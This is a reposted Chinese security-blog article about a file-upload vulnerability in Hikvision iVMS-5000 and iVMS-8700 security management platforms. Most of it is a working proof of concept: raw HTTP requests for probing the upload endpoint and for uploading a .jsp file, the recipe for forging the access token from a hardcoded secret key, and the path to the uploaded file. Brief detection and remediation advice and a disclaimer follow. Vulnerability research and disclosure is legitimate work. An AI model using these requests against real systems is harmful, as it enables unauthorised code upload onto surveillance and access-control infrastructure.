海康iVMS综合安防存在文件上传漏洞

admin 2024年3月15日09:47:32评论100 views字数 1711阅读5分42秒阅读模式
前言

综合安防系统是一款功能强大的综合性管理平台,其特点是视频监控与门禁一卡通的深度融合,海康的系统在系统中大量存在,出于学习的目的,通过授权测试对象对该漏洞进行研究和复现。

正文

影响版本

01

海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700

漏洞探测

02

POST /eps/api/resourceOperations/upload HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://ip:portConnection: closeCookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9Upgrade-Insecure-Requests: 1Content-Length: 62service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action

海康iVMS综合安防存在文件上传漏洞

漏洞验证

03

 

POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPoUpgrade-Insecure-Requests: 1Content-Length: 174------WebKitFormBoundaryGEJwiloiPoContent-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpegtest------WebKitFormBoundaryGEJwiloiPo

其中token的值为

MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值

海康iVMS综合安防存在文件上传漏洞

访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp

海康iVMS综合安防存在文件上传漏洞

漏洞自查与修复

04

自查方式:通过发送前文提到的漏洞探测数据包,观察返回的状态码为200,并且提示token empty!字样则可能存在漏洞,需要及时排查修复。

修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。

参考链接:

https://blog.csdn.net/qq_50854662/article/details/131481634

后记

海康iVMS综合安防存在文件上传漏洞

 

原文始发于微信公众号(玄知安全实验室):海康iVMS综合安防存在文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月15日09:47:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康iVMS综合安防存在文件上传漏洞https://cn-sec.com/archives/2576256.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息